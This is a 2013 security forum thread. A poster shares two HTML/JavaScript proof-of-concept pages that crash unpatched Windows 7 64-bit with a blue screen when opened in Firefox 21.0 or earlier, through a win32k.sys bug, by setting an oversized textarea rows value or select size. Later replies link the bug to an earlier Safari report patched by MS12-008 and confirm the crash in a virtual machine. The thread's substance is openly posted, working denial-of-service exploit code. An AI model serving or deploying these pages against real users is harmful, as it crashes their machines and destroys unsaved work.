Results 1 to 7 of 7

Thread: BSOD win7 Firefox <= 21.0 Share/Save - My123World.Com!

  1. #1

    BSOD win7 Firefox <= 21.0

    The code is not yet released. But it causes unpatched windows7 64bit to Blue Screen Of Death as soon as the webpage is opened.
    The problem lies in win32k.sys.
    There are two different triggers for same bug to be triggered.

    Code:
    <html>
    <head>
    <title>Firefox BSOD unpatched Win7-64bit : "vinnu"</title>
    </head>
    <body>
    
    <script>
    function bsod()	{
    	var tob = document.createElement("textarea");
    	tob.rows = "1879572480";
    alert("BSOD");
    	var btob = document.body.appendChild(tob);
    }
    </script>
    <input type = button value="BSOD textarea" onclick="bsod();" />
    
    </body></html>
    ..."vinnu"
    Last edited by "vinnu"; 06-04-2013 at 10:55 PM.

  2. #2
    Another Trigger :

    Code:
    
    <html>
    <head>
    <title>Firefox BSOD win 7 64 bit unpatched ..."vinnu"</title>
    </head>
    <body>
    
    <script>
    function bsod()	{
    	var obj = document.createElement("select");
    	obj.size = 0x78180000;
    	var bobj = document.body.appendChild(obj);
    }
    </script>
    <input type=button value="BSOD Win7" onclick="bsod();" />
    
    </body></html>

    ..."vinnu"

  3. #3
    Tomorrow another Vulnerability.


    ..."vinnu"

  4. #4
    Nice find.

    Ok, this is basically what I reported in 2011, the bug which could be triggered from Safari with an iframe.
    If you have applied MS12-008, this patches the issue.
    Last edited by webdevil; 06-05-2013 at 08:58 PM.

  5. #5
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    @webdevil cool ,were we aware of a poc to trigger the bug via FF or any other browsers back then ??
    Hacking Is a Matter of Time Knowledge and Patience

  6. #6
    just created a video for the 1st post...
    Second trigger has also exactly the same result.
    Worked on a vbox virtual machine with windows 7 professional N 64 bit on firefox version 21.0

    https://vimeo.com/67734591

  7. #7
    Yes webdevil these are same as yours on Safari, It triggers the same issue, you made Microsoft to patch it P

    ..."vinnu"

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •